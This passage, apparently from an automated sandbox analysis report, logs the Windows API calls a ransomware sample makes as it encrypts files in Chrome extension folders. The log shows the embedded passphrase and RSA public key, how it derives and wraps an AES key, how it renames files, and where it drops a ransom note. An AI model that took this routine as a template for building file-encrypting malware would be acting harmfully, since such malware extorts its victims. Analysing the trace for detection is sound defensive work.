"c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.498] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.499] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.499] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.502] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.502] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.502] CryptHashData (hHash=0x2e18128, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.502] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e194a8) returned 1 [0257.502] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.502] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.502] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e158e0) returned 1 [0257.503] CryptImportPublicKeyInfo (in: hCryptProv=0x2e158e0, dwCertEncodingType=0x1, pInfo=0x2e255e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e25610*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e25618*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19ae8) returned 1 [0257.503] CryptEncrypt (in: hKey=0x2e19ae8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.503] CryptEncrypt (in: hKey=0x2e19ae8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e15da8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e15da8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.503] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e15da8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e15da8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.504] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xd5, lpOverlapped=0x0) returned 1 [0257.505] CryptEncrypt (in: hKey=0x2e194a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd5, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0257.505] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0257.505] CloseHandle (hObject=0x5d5c) returned 1 [0257.505] CloseHandle (hObject=0x5d60) returned 1 [0257.506] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\messages.json"), bFailIfExists=0) returned 1 [0257.509] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\messages.json", dwFileAttributes=0x0) returned 1 [0257.509] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\messages.json.gsg")) returned 1 [0257.511] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\messages.json.fuck")) returned 1 [0257.515] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.515] CryptDestroyKey (hKey=0x2e194a8) returned 1 [0257.515] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.515] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.515] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.515] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\readme_back_files.htm")) returned 0xffffffff [0257.515] AreFileApisANSI () returned 1 [0257.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.516] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.516] GetFileType (hFile=0x5d50) returned 0x1 [0257.517] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.518] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.518] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.518] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.518] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.518] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.518] GetLastError () returned 0x0 [0257.518] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\messages.json")) returned 0x20 [0257.518] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\messages.json", dwFileAttributes=0x80) returned 1 [0257.519] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.520] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.521] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.522] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298a040) returned 1 [0257.524] CryptCreateHash (in: hProv=0x298a040, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.524] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.524] CryptHashData (hHash=0x2e18128, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.524] CryptDeriveKey (in: hProv=0x298a040, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e194a8) returned 1 [0257.524] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.524] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.524] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x29895a0) returned 1 [0257.525] CryptImportPublicKeyInfo (in: hCryptProv=0x29895a0, dwCertEncodingType=0x1, pInfo=0x2e24c20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e24c50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e24c58*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19b28) returned 1 [0257.525] CryptEncrypt (in: hKey=0x2e19b28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.525] CryptEncrypt (in: hKey=0x2e19b28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e13988*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e13988*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.525] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e13988*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e13988*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.526] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xc6, lpOverlapped=0x0) returned 1 [0257.535] CryptEncrypt (in: hKey=0x2e194a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc6, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0257.535] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0257.536] CloseHandle (hObject=0x5d60) returned 1 [0257.536] CloseHandle (hObject=0x5d5c) returned 1 [0257.536] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\messages.json"), bFailIfExists=0) returned 1 [0257.552] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\messages.json", dwFileAttributes=0x0) returned 1 [0257.553] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\messages.json.gsg")) returned 1 [0257.554] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\messages.json.fuck")) returned 1 [0257.555] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.555] CryptDestroyKey (hKey=0x2e194a8) returned 1 [0257.555] CryptReleaseContext (hProv=0x298a040, dwFlags=0x0) returned 1 [0257.555] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.555] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.556] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\readme_back_files.htm")) returned 0xffffffff [0257.556] AreFileApisANSI () returned 1 [0257.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.556] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\lv\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.557] GetFileType (hFile=0x5d50) returned 0x1 [0257.557] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.558] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.558] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18128 [0257.559] FindNextFileA (in: hFindFile=0x2e18128, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.559] FindNextFileA (in: hFindFile=0x2e18128, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.559] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.560] GetLastError () returned 0x0 [0257.560] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\messages.json")) returned 0x20 [0257.560] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\messages.json", dwFileAttributes=0x80) returned 1 [0257.560] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.561] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.562] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ml\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.562] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293aae8) returned 1 [0257.564] CryptCreateHash (in: hProv=0x293aae8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.564] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.564] CryptHashData (hHash=0x2e180e8, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.564] CryptDeriveKey (in: hProv=0x293aae8, Algid=0x6610, hBaseData=0x2e180e8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e19828) returned 1 [0257.565] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.565] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.565] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e15b88) returned 1 [0257.565] CryptImportPublicKeyInfo (in: hCryptProv=0x2e15b88, dwCertEncodingType=0x1, pInfo=0x2e25780*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e257b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e257b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e198a8) returned 1 [0257.565] CryptEncrypt (in: hKey=0x2e198a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: 